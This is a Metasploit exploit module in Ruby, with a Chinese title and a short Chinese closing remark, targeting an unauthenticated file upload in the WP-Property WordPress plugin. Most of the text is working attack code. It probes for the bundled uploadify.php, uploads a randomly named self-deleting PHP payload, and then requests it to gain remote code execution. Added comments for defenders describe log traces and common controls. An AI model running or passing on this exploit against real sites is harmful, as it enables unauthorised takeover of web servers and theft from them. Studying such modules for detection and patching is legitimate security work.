WordPress WP-Property PHP 文件上传漏洞
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

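require 'msf/core'
require 'msf/core/exploit/php_exe'

# Metasploit module for the unauthenticated file upload in the WP-Property
# WordPress plugin (<= 1.35.0, per the module description below).
#
# The listing was recovered from a paste in which filler characters had been
# interleaved with the code and the PhpEXE mixin name had been mangled; the
# statements themselves are unchanged.
#
# Notes for defenders reading this module:
# * Both the probe and the upload target
#   wp-content/plugins/wp-property/third-party/uploadify/uploadify.php under the
#   WordPress base path. A multipart POST to that script followed by a GET for
#   a five-letter, randomly named .php file is the request pattern this module
#   leaves in web-server access logs.
# * The payload is built with :unlink_self => true, which presumably makes the
#   dropped file delete itself once it runs -- confirm against the PhpEXE
#   mixin. If so, the file may no longer be on disk during triage and the
#   access log is the more dependable artefact.
# * The weakness described is an upload handler that is reachable without
#   authentication and writes caller-named files into a web-served directory.
#   Remediation is not covered on this page; moving to a plugin release newer
#   than 1.35.0, removing the bundled uploadify.php, and denying PHP execution
#   in upload directories are the usual controls -- verify against the vendor
#   advisory.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  # Registers the module metadata (references, payload constraints, targets)
  # and the single TARGETURI option.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  # Probes for the bundled upload script with a single GET.
  #
  # The only signal used is the HTTP status: no version string or response
  # body is inspected, so "Appears" means "the script answered 200", not "the
  # installed plugin is a vulnerable release". A fixed install that still
  # ships the file would presumably be reported the same way.
  #
  # @return [Exploit::CheckCode::Unknown] no response, or a status other than 200
  # @return [Exploit::CheckCode::Appears] the script answered with 200
  def check
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    })

    if not res or res.code != 200
      return Exploit::CheckCode::Unknown
    end

    return Exploit::CheckCode::Appears
  end

  # Sends the multipart upload to uploadify.php and then requests the path the
  # server reports back for the stored file.
  #
  # The form carries two parts: "Filedata" (the generated payload under a
  # random five-letter .php name) and "folder" (the uploadify directory under
  # the WordPress base path). The upload counts as successful only when the
  # reply is a 200 whose body contains the chosen file name; otherwise the
  # module aborts with Failure::UnexpectedReply.
  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'

    peer = "#{rhost}:#{rport}"

    @payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
    # Strips the CRLF that precedes a boundary marker at the start of a line in
    # the serialized message.
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    if not res or res.code != 200 or res.body !~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # The response body is used verbatim as the URI of the stored file.
    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    res = send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end
end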

不要问我这写的是什么 怎么利用 我是说msf.